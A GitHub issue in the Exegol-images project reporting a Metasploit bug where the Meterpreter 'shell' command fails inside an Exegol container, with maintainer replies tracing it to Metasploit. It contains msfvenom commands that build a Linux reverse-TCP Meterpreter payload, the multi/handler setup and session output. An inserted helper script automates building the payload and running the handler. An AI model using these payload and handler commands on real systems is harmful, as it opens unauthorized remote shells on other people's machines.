ThePorgs / Exegol-images

Docker images of the Exegol project
https://exegol.readthedocs.io/
GNU General Public License v3.0

Meterpreter Shell Opening Error on Exegol After Obtaining Session #408

Closed HeaZzY closed 1 week ago

HeaZzY commented 1 week ago

Describe the bug

After launching an attack using Metasploit on Exegol (Nightly version), the Meterpreter session is successfully created, but the shell fails to open. This unexpected behavior prevents interaction with the target machine through the obtained session.

Expected behavior: An interactive shell should open after successfully obtaining the Meterpreter session.

Steps To Reproduce

Context

Machine A: Exegol Nightly
Machine B: Debian VM with Metasploit
Machine C: Target machine (Linux or Windows, adapt the payload accordingly); a Linux machine in my case

First PoC via Exegol

Create the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f elf > rev.elf

Launch Metasploit in the Exegol container

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; run"

Execute the payload on Machine C

./rev.elf

Try to open a shell on the obtained session

[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:49820) at 2024-10-24 20:14:27 +0200

meterpreter > shell
Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

Result: The session is created, but opening the shell fails.

[screenshot: metas1]

PoC via a VM

Create the payload

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f elf > rev.elf

Launch Metasploit in the container

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; run"

Execute the payload on Machine C

./rev.elf

Try to open a shell on the obtained session

[*] Started reverse TCP handler on 10.10.14.7:80
[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:5640) at 2024-10-24 20:32:26 +0200

meterpreter > shell
Process 3145 created.
Channel 1 created.

whoami
riley

[screenshot: metas2]

Exegol Wrapper Version

PS C:\Users\heazzy> python -m exegol version -vvv
[*] Exegol is currently in version v4.3.6
[*] Exegol Discord serv.: https://discord.gg/cXThyp7D6P
[*] Exegol documentation: https://exegol.rtfd.io/
[D] Pip installation: On ✔
[D] Git source installation: Off 🪓
[D] Host OS: Windows (WSL2)
[D] Arch: amd64
[D] Windows release: 10.0.22631
[D] Python environment: Windows
[D] Docker engine: WSL2
[D] Docker desktop: On ✔
[D] Shell type: Windows
[D] Last wrapper update check: 21/10/2024

Exegol container information

[*] Exegol is currently in version v4.3.6
[*] Exegol Discord serv.: https://discord.gg/cXThyp7D6P
[*] Exegol documentation: https://exegol.rtfd.io/
[V] Listing user configurations

🧠 User configurations
┌────────────────────────────────────────────────────────────┐
│ User config file: C:\Users\heazzy\.exegol\config.yml       │
│ Private workspace: C:\Users\heazzy\.exegol\workspaces      │
│ Exegol resources: C:\Users\heazzy\.exegol\exegol-resources │
│ My resources: C:\Users\heazzy\.exegol\my-resources         │
│ Auto-check updates: On ✔                                   │
│ Auto-remove images: On ✔                                   │
│ Auto-update fs: Off 🪓                                     │
│ Default start shell: zsh                                   │
│ Shell logging method: asciinema                            │
│ Shell logging compression: On ✔                            │
│ Desktop enabled by default: Off 🪓                         │
│ Desktop default protocol: http                             │
│ Desktop default host: localhost                            │
└────────────────────────────────────────────────────────────┘

[V] Listing git repositories
[!] Exegol has not been installed via git clone. Skipping wrapper auto-update operation.
[*] If you have installed Exegol with pip, check for an update with the command pip3 install exegol --upgrade
[!] Exegol has not been installed via git clone. Skipping wrapper auto-update operation.
[*] If you have installed Exegol with pip, check for an update with the command pip3 install exegol --upgrade

🐙 Project modules
┌───────────┬───────────────┬────────────────┐
│ Name      │ Status        │ Current branch │
├───────────┼───────────────┼────────────────┤
│ Wrapper   │ Not installed │ ? 🤷           │
│ Images    │ Not installed │ ? 🤷           │
│ Resources │ Up to date    │ main           │
└───────────┴───────────────┴────────────────┘

⭐ Container summary
┌──────────────────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│             Name │ test2 (Running)                                                                                                       │
│            Image │ nightly - v.b6d1cef2 (Up to date) (amd64)                                                                             │
├──────────────────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤
│      Credentials │ root : RuCGMBvHi9yKXsY0noYbkmLGDO2E25                                                                                 │
│   Remote Desktop │ Off 🪓                                                                                                                │
│    Creation date │ 24/10/2024 20:09                                                                                                      │
│      Console GUI │ On ✔ (X11)                                                                                                            │
│          Network │ bridge with VPN                                                                                                       │
│         Timezone │ On ✔                                                                                                                  │
│ Exegol resources │ On ✔ (/opt/resources)                                                                                                 │
│     My resources │ On ✔ (/opt/my-resources)                                                                                              │
│    Shell logging │ Off 🪓                                                                                                                │
│              VPN │ pro_labs_Heazzy.ovpn                                                                                                  │
│       Privileged │ Off ✔                                                                                                                 │
│     Capabilities │ NET_ADMIN                                                                                                             │
│        Workspace │ Dedicated (/workspace)                                                                                                │
│          Devices │ /dev/net/tun:/dev/net/tun:rwm                                                                                         │
│             Envs │ DISPLAY=:0                                                                                                            │
│                  │ _JAVA_AWT_WM_NONREPARENTING=1                                                                                         │
│                  │ QT_X11_NO_MITSHM=1                                                                                                    │
│                  │ TZ=Europe/Paris                                                                                                       │
│                  │ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                                                     │
│          Volumes │ (RO) C:/Users/heazzy/AppData/Roaming/Python/Python312/site-packages/exegol/utils/imgsync/spawn.sh ➡ /.exegol/spawn.sh │
│                  │ (RW) \\wsl.localhost\Ubuntu-22.04\mnt\wslg\.X11-unix ➡ /tmp/.X11-unix                                                 │
│                  │ (RW) C:/Users/heazzy/.exegol/my-resources ➡ /opt/my-resources                                                         │
│                  │ (RW) C:/Users/heazzy/.exegol/exegol-resources ➡ /opt/resources                                                        │
│                  │ (RO) C:/Users/heazzy/pro_labs_Heazzy.ovpn ➡ /.exegol/vpn/config/client.ovpn                                           │
│                  │ (RW) C:/Users/heazzy/.exegol/workspaces/test2 ➡ /workspace                                                            │
│         Systctls │ net.ipv6.conf.all.disable_ipv6 = 0                                                                                    │
└──────────────────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘

Exception

No response

Additional context

[Oct 24, 2024 - 20:52:45 (CEST)] exegol-test2 /workspace # zcat /var/log/exegol/load_setups.log.gz || cat /var/log/exegol/load_setups.log
[EXEGOL] This log file is the result of the execution of the official and personal customization script
[EXEGOL] [24-10-2024_20-09-38] ==== Loading custom setups (/.exegol/load_supported_setups.sh) ====
[EXEGOL] Initialization
[EXEGOL] Checking environment variables
HOSTNAME=exegol-test2
PWD=/workspace
TZ=Europe/Paris
HOME=/root
_JAVA_AWT_WM_NONREPARENTING=1
TERM=xterm-256color
DISPLAY=:0
SHLVL=2
PATH=/root/.nvm/versions/node/v23.0.0/bin:/root/.asdf/shims:/root/.asdf/bin:/root/.pyenv/shims:/root/.pyenv/bin:/root/.local/bin:/opt/tools/john/run:/opt/tools/bin:/usr/local/rvm/gems/ruby-3.2.2/bin:/usr/local/rvm/gems/ruby-3.2.2@global/bin:/usr/local/rvm/rubies/ruby-3.2.2/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/rvm/bin:/opt/my-resources/bin:/root/.dotnet:/root/.dotnet/tools:/opt/tools/fzf/bin
QT_X11_NO_MITSHM=1
_=/usr/bin/env
LOGNAME=root
OLDPWD=/workspace
rvm_prefix=/usr/local
rvm_path=/usr/local/rvm
rvm_bin_path=/usr/local/rvm/bin
rvm_version=1.29.12-next (master)
GEM_HOME=/usr/local/rvm/gems/ruby-3.2.2
GEM_PATH=/usr/local/rvm/gems/ruby-3.2.2:/usr/local/rvm/gems/ruby-3.2.2@global
MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.2.2
IRBRC=/usr/local/rvm/rubies/ruby-3.2.2/.irbrc
RUBY_VERSION=ruby-3.2.2
GO111MODULE=auto
JOHN=/opt/tools/john/run
LC_ALL=en_US.UTF-8
LANG=en_US.UTF-8
LANGUAGE=en_US:en
PYENV_ROOT=/root/.pyenv
PYENV_SHELL=zsh
DOTNET_ROOT=/root/.dotnet
ZSH=/root/.oh-my-zsh
FZF_BASE=/opt/tools/fzf
ASDF_DIR=/root/.asdf
GOPATH=/root/.asdf/installs/golang/1.22.2/packages
PAGER=less
LESS=-R
LSCOLORS=Gxfxcxdxbxegedabagacad
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.swp=00;90:*.tmp=00;90:*.dpkg-dist=00;90:*.dpkg-old=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:
ZSH_TMUX_TERM=screen
ZSH_TMUX_CONFIG=/root/.tmux.conf
_ZSH_TMUX_FIXED_CONFIG=/root/.oh-my-zsh/plugins/tmux/tmux.extra.conf
NVM_DIR=/root/.nvm
NVM_CD_FLAGS=-q
NVM_BIN=/root/.nvm/versions/node/v23.0.0/bin
NVM_INC=/root/.nvm/versions/node/v23.0.0/include/node
HISTFILESIZE=1000000000
HISTSIZE=1000000000
HISTTIMEFORMAT=[%F %T]
RED=\033[1;31m
BLUE=\033[1;34m
GREEN=\033[1;32m
NOCOLOR=\033[0m
[EXEGOL] Deploying /opt/my-resources
[EXEGOL] Copying README.md to /opt/my-resources
[EXEGOL] Deploying zsh
[EXEGOL] Deploying tmux
[EXEGOL] Deploying vim
[EXEGOL] Deploying nvim
[EXEGOL] Deploying APT packages
[EXEGOL] No APT package to install.
[EXEGOL] Deploying python3 packages
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable.It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.
[EXEGOL] Deploying Firefox Add-Ons
[-] No addons were found in the list /opt/my-resources/setup/firefox/addons.txt

[-] No addons were found in the folder /opt/my-resources/setup/firefox/addons

[-] No addons were found.
[EXEGOL] Deploying BloodHound
[EXEGOL] Deploying BloodHound User Config
[EXEGOL] Merging User Custom Queries for BloodHound, and overwriting Exegol Custom Queries
[EXEGOL] Merging User Custom Queries with Exegol Custom Queries for BloodHound
[EXEGOL] Trusting Burp CA certificate in Firefox
[*] Generating Burp CA and trusting in Firefox
[*] Looking for available port
[*] Preparing burp configuration file
[*] Starting Burp and waiting for proxy to listen
Oct 24, 2024 8:09:39 PM java.util.prefs.FileSystemPreferences$1 run
INFO: Created user preferences directory.
[*] Retrieving CA
[*] Trusting cert PortSwigger CA (/tmp/cacert.der) in Firefox
[+] CA trusted successfully
[EXEGOL] Trusting user CA certificates in Firefox
[EXEGOL] Deploying custom arsenal cheatsheet
[EXEGOL] Executing user setup
[EXEGOL] [24-10-2024_20-09-48] ==== Loading user setup (/opt/my-resources/setup/load_user_setup.sh) ====
[EXEGOL] Installing my-resources user's defined custom setup ...
[EXEGOL] [24-10-2024_20-09-48] ==== End of custom setups loading ====
[Oct 24, 2024 - 20:52:48 (CEST)] 
exegol-test2 /workspace #

Anything else?

With Debian VM

[screenshot: metas2]

With Exegol Nightly on windows

[screenshot: metas1]

Test on windows ARM machine

With Exegol FULL

[screenshot: metasploit2]

With ubuntu wsl

[screenshot: metasploit1]
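
The reproduction above is a manual, per-machine procedure. Below is an added helper script (not part of the issue or of the Exegol project) that scripts the same steps and classifies the outcome from the msfconsole transcript, so the check can be repeated identically on each environment being compared (Exegol nightly, Exegol full, the Debian VM, Ubuntu WSL) and the environment snapshots diffed afterwards. It assumes msfvenom and msfconsole are on PATH, that LHOST/LPORT are reachable from a Linux x64 target, and that you run the generated rev.elf on that target yourself; the `spool`, `version` and `exit -y` console commands and `msfvenom -o` are standard Metasploit features. The two transcript constants are constructed from the output pasted in this issue and are only there so the classifier can be self-tested offline.

```shell
#!/usr/bin/env bash
# Added example (not from the issue or the Exegol project): runs the
# reproduction steps above headlessly and classifies the outcome from the
# console transcript, so the same check can be repeated in each environment
# (Exegol nightly/full, Debian VM, Ubuntu WSL) and the results diffed.
#
# Assumptions: msfvenom and msfconsole are on PATH, LHOST/LPORT are reachable
# from a Linux x64 target, and you run rev.elf on that target yourself. The
# transcript constants below are copied from the two PoCs in the issue.
set -u

# Constructed sample transcripts (taken from the issue text) used for self-test.
EXEGOL_TRANSCRIPT='[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:49820) at 2024-10-24 20:14:27 +0200
meterpreter > shell
Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments'

VM_TRANSCRIPT='[*] Started reverse TCP handler on 10.10.14.7:80
[*] Sending stage (3045380 bytes) to 10.10.110.35
[*] Meterpreter session 1 opened (10.10.14.7:80 -> 10.10.110.35:5640) at 2024-10-24 20:32:26 +0200
meterpreter > shell
Process 3145 created.
Channel 1 created.'

# Classify an msfconsole transcript read from stdin. Prints exactly one of:
#   no-session  handler never reported an opened Meterpreter session
#   shell-bug   session opened, `shell` failed with Rex::ArgumentError
#   shell-ok    session opened, `shell` created a process and a channel
#   unknown     session opened but `shell` left no recognisable trace
classify_msf_log() {
    local text
    text=$(cat)
    if ! printf '%s\n' "$text" | grep -q 'Meterpreter session [0-9][0-9]* opened'; then
        echo no-session; return 0
    fi
    if printf '%s\n' "$text" | grep -q 'Rex::ArgumentError.*Unknown type for arguments'; then
        echo shell-bug; return 0
    fi
    if printf '%s\n' "$text" | grep -q 'Process [0-9][0-9]* created\.' &&
       printf '%s\n' "$text" | grep -q 'Channel [0-9][0-9]* created\.'; then
        echo shell-ok; return 0
    fi
    echo unknown
}

# Resource script: same handler and payload as the issue, with `spool` so the
# whole console session (including the meterpreter> prompt) lands in a file.
make_rc() { # $1=LHOST $2=LPORT $3=transcript path $4=rc output path
    cat > "$4" <<EOF
spool $3
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
run
EOF
}

# Snapshot of the environment to diff between machines (framework version,
# Ruby, rex-*/metasploit gems): the maintainer traced the bug to Metasploit,
# not Exegol, so this is what to compare first.
collect_msf_env() { # $1=output file
    {
        echo "# $(date -u +%FT%TZ) $(hostname)"
        ruby -v 2>/dev/null
        msfconsole -q -x 'version; exit -y' 2>/dev/null
        gem list 2>/dev/null | grep -E '^(rex-|metasploit)'
    } > "$1"
}

repro() { # $1=LHOST $2=LPORT $3=workdir
    mkdir -p "$3"
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST="$1" LPORT="$2" -f elf -o "$3/rev.elf"
    make_rc "$1" "$2" "$3/msf.log" "$3/repro.rc"
    collect_msf_env "$3/env.txt"
    echo "[*] copy $3/rev.elf to the target and run it; in the session type 'shell', then 'exit' twice"
    msfconsole -q -r "$3/repro.rc"
    echo "[*] verdict: $(classify_msf_log < "$3/msf.log")  (details: $3/msf.log, $3/env.txt)"
}

# Usage: ./msf_shell_check.sh run <LHOST> <LPORT> [workdir]
if [ "${1:-}" = run ]; then
    repro "$2" "$3" "${4:-./msf-shell-check}"
fi
```

Run it once per environment, keep the resulting msf.log and env.txt, and `diff` the env.txt files: a `shell-bug` verdict on one side and `shell-ok` on the other with different framework or rex gem versions points at the framework rather than the container image, which is what the maintainer concluded below.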

QU35T-code commented 1 week ago

Thank you very much for the PoC, I will try to reproduce and fix it quickly!!!

QU35T-code commented 1 week ago

@HeaZzY,

After testing, the issue comes from Metasploit and not Exegol :/ This is now fixed and will be deployed on the new nightly image. Thanks for this comprehensive and understandable issue!

https://github.com/rapid7/metasploit-framework/issues/19569

[screenshot: Screenshot 2024-10-24 at 22 47 36]

abbashaider562 commented 3 days ago

> @HeaZzY,
>
> After testing, the issue comes from Metasploit and not Exegol :/ This is now fixed and will be deployed on the new nightly image. Thanks for this comprehensive and understandable issue!
>
> rapid7/metasploit-framework#19569
>
> [screenshot: Screenshot 2024-10-24 at 22 47 36]

Is this issue resolved? I am having the same issue.